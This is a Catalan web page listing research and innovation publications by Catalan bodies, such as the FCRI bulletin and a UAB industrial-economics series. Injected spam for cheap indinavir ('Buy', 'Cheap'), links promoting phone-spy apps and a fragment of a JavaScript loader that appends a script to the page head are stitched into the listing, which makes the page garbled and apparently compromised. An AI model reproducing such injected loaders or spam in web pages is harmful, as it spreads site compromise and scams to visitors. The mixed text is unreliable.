General

Guia de publicacions de recerca, innovació i tecnologia

Relació de publicacions periòdiques i monogràfiques sobre la industria i la innovació editades per universitats i centres tecnològics catalans.

 

online

BUTLLETÍ FUNDACIÓ CATALANA PER A LA RECERCA I LA INNOVACIÓ Pills

El Butlletí de Recerca i Innovació de la Fundació Catalana per a la Recerca i la Innovació és un recull d’informació setmanal de les principals notícies i activitats sobre política científica, institucions i agents de la recerca a nivell català, espanyol i europeu.
Consultar


UAB.
Col·lecció: Documents d’Economia Industrial (EN PAPER)

L’objectiu de la col·lecció Documents d’Economia Industrial és contribuir al debat sobre les grans preocupacions de la indústria, tant a Espanya com a Europa, aportar les contribucions dels millors especialistes sobre les diferents matèries i servir de lloc de reflexió per a tots aquells implicats en l’activitat industrial: empresaris, professionals, treballadors acadèmics i responsables de la política industrial. La col·lecció està editada per Centre d’Economia Industrial.
Consultar

Cheap


ENGINYERS INDUSTRIALS DE CATALUNYA. REVISTA FULL DELS ENGINYERS

Consultar

  online

cheap crixivan/indinavir

} else {

Buy
if (document.currentScript) { d.getElementsByTagName(‘head’)[0].appendChild(s);} Buy http://printhouseadvertising.com/line-spy-best-iphone-spy-apps-phone-location-tracker/http://healing-international.com/?p=4254